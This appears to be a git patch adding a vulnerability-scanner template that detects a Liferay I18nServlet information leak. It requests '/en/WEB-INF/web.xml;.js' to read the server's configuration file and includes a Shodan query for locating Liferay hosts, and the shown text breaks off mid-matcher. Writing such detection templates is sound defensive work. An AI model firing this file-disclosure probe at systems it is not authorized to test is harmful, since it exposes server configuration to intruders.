From 1d1b95fd89718d64c3fe7895f951853a0b198b39 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 7 Aug 2022 23:05:09 +0530
Subject: [PATCH] Create liferay-resource-leak.yaml
---
misconfiguration/liferay-resource-leak.yaml | 36 +++++++++++++++++++++
1 file changed, 36 insertions(+)
create mode 100644 misconfiguration/liferay-resource-leak.yaml
diff --git a/misconfiguration/liferay-resource-leak.yaml b/misconfiguration/liferay-resource-leak.yaml
new file mode 100644
index 0000000000..7bc714529c
--- /dev/null
+++ b/misconfiguration/liferay-resource-leak.yaml
@@ -0,0 +1,36 @@
+id: liferay-resource-leak
+
+info:
+ name: Liferay - Resource leakage through I18nServlet
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works).
+ remediation: Update Liferay to the latest version
+ reference:
+ - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
+ metadata:
+ verified: true
+ shodan-query: title:"Liferay"
+ tags: liferay,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/en/WEB-INF/web.xml;.js"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "